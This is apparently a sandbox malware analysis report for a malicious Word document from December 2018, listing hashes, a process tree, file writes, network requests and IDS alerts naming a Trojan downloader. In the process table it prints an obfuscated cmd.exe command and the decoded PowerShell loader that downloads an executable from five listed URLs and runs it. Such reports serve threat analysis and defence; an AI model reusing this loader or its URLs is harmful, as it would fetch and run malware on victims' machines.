File name: | IBAN_DE09 8449 6706 7540 7003 39.doc |
Full analysis: | https://app.any.run/tasks/5e3a3a84-ed98-40dc-9835-eec3828b327d |
Verdict: | Malicious activity |
Analysis date: | December 18, 2018, 12:24:55 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 07:36:00 2018, Last Saved Time/Date: Tue Dec 18 07:36:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 33, Security: 0 |
MD5: | 00170F53D4D8C3C1B50CB398290136A1 |
SHA1: | 449A9B0D443B98A895B64FF5CFBBD420247079AB |
SHA256: | 7C176A1C360D036BF7E4D92A565B5C3C17CF7BE95DE53336606783B5C5C89C55 |
SSDEEP: | 1536:FL4w1LD4fbKghmXB5luOUom8uW41LIpiXievnH+a9:Fcw13eKQOUo101O+iev |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:18 07:36:00 |
ModifyDate: | 2018:12:18 07:36:00 |
Pages: | 1 |
Words: | 5 |
Characters: | 33 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 37 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3456 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\IBAN_DE09 8449 6706 7540 7003 39.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2256 | c:\sVwCiOzTWNiPm\WzCkFlcVSW\VlBsmipsbU\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set W6XZ=;'jcW'=Fjo$}}{hctac}};kaerb;'TLz'=lbz$;SEc$ metI-ekovnI{ )00008 eg- htgnel.)SEc$ metI-teG(( fI;'qpt'=whj$;)SEc$ ,NFz$(eliFdaolnwoD.ztL${yrt{)qjP$ ni NFz$(hcaerof;'exe.'+WCk$+'\'+pmet:vne$=SEc$;'SKz'=Tcu$;'599' = WCk$;'lvI'=brk$;)'@'(tilpS.'Of3mJi1/moc.gepohsknip.www//:ptth@0vb6pEI/gro.laiafamafa.www//:ptth@8IIXV32/gro.amhcim//:ptth@fURWISRxU8/moc.secivresretupmocaesnaws.www//:ptth@0NgwrKGs2Y/moc.oknecvov-llatsnner.www//:ptth'=qjP$;tneilCbeW.teN tcejbo-wen=ztL$;'rvj'=tZz$ llehsrewop&&for /L %X in (485,-1,0)do set Pjv=!Pjv!!W6XZ:~%X,1!&&if %X leq 0 call %Pjv:*Pjv!=%" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2832 | CmD /V/C"set W6XZ=;'jcW'=Fjo$}}{hctac}};kaerb;'TLz'=lbz$;SEc$ metI-ekovnI{ )00008 eg- htgnel.)SEc$ metI-teG(( fI;'qpt'=whj$;)SEc$ ,NFz$(eliFdaolnwoD.ztL${yrt{)qjP$ ni NFz$(hcaerof;'exe.'+WCk$+'\'+pmet:vne$=SEc$;'SKz'=Tcu$;'599' = WCk$;'lvI'=brk$;)'@'(tilpS.'Of3mJi1/moc.gepohsknip.www//:ptth@0vb6pEI/gro.laiafamafa.www//:ptth@8IIXV32/gro.amhcim//:ptth@fURWISRxU8/moc.secivresretupmocaesnaws.www//:ptth@0NgwrKGs2Y/moc.oknecvov-llatsnner.www//:ptth'=qjP$;tneilCbeW.teN tcejbo-wen=ztL$;'rvj'=tZz$ llehsrewop&&for /L %X in (485,-1,0)do set Pjv=!Pjv!!W6XZ:~%X,1!&&if %X leq 0 call %Pjv:*Pjv!=%" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2956 | powershell $zZt='jvr';$Ltz=new-object Net.WebClient;$Pjq='http://www.rennstall-vovcenko.com/Y2sGKrwgN0@http://www.swanseacomputerservices.com/8UxRSIWRUf@http://michma.org/23VXII8@http://www.afamafaial.org/IEp6bv0@http://www.pinkshopeg.com/1iJm3fO'.Split('@');$krb='Ivl';$kCW = '995';$ucT='zKS';$cES=$env:temp+'\'+$kCW+'.exe';foreach($zFN in $Pjq){try{$Ltz.DownloadFile($zFN, $cES);$jhw='tpq';If ((Get-Item $cES).length -ge 80000) {Invoke-Item $cES;$zbl='zLT';break;}}catch{}}$ojF='Wcj'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3456 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9485.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3456 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7ACC413F.wmf | — | |
MD5:— | SHA256:— | |||
3456 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\672B1CA5.wmf | — | |
MD5:— | SHA256:— | |||
2956 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HSLSPY1B7KGR6NM4CG8S.temp | — | |
MD5:— | SHA256:— | |||
3456 | WINWORD.EXE | C:\Users\admin\Desktop\~$AN_DE09 8449 6706 7540 7003 39.doc | pgc | |
MD5:B26B6543891689F3829EBADCFAD47F0D | SHA256:2BD996F08EE09620FD2EDD387023B86560817506C78CC8E38EBA1B986E9630D7 | |||
2956 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19aba7.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3456 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\IBAN_DE09 8449 6706 7540 7003 39.doc.LNK | lnk | |
MD5:487FF745FC11C6E37F6855F2E1C262C6 | SHA256:19C4BE2780F2922C6EDA3AB2479FE6B787F16FCEB7611AEA5A1143D1737358D6 | |||
3456 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:018864AA91FDBEF03D2CA1BF12C8408F | SHA256:6AF37383E025E212B2512E63CB1726D52D7A14997360096CA21FF0049535F7F5 | |||
2956 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3456 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4FDB84B6.wmf | wmf | |
MD5:78BE138748FF69170709633A86E877D2 | SHA256:8DABB7C5738E97B86DD17CB4E8A2E7389FC782BDCFC36EF7984EFA00EEE3A9BF |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2956 | powershell.exe | GET | 404 | 93.90.146.103:80 | http://www.rennstall-vovcenko.com/Y2sGKrwgN0 | SE | xml | 345 b | malicious |
2956 | powershell.exe | GET | 404 | 192.185.153.254:80 | http://www.swanseacomputerservices.com/8UxRSIWRUf | US | xml | 345 b | malicious |
2956 | powershell.exe | GET | 404 | 208.115.221.18:80 | http://www.afamafaial.org/IEp6bv0 | US | xml | 345 b | malicious |
2956 | powershell.exe | GET | 404 | 162.214.0.89:80 | http://www.pinkshopeg.com/1iJm3fO | US | xml | 345 b | malicious |
2956 | powershell.exe | GET | 404 | 50.87.248.189:80 | http://michma.org/23VXII8 | US | xml | 345 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2956 | powershell.exe | 192.185.153.254:80 | www.swanseacomputerservices.com | CyrusOne LLC | US | malicious |
2956 | powershell.exe | 93.90.146.103:80 | www.rennstall-vovcenko.com | Levonline AB | SE | suspicious |
2956 | powershell.exe | 208.115.221.18:80 | www.afamafaial.org | Limestone Networks, Inc. | US | malicious |
2956 | powershell.exe | 162.214.0.89:80 | www.pinkshopeg.com | Unified Layer | US | malicious |
2956 | powershell.exe | 50.87.248.189:80 | michma.org | Unified Layer | US | malicious |
Domain | IP | Reputation |
---|---|---|
www.rennstall-vovcenko.com |
| malicious |
www.swanseacomputerservices.com |
| malicious |
michma.org |
| malicious |
www.afamafaial.org |
| malicious |
www.pinkshopeg.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2956 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2956 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2956 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2956 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2956 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2956 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2956 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2956 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2956 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2956 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |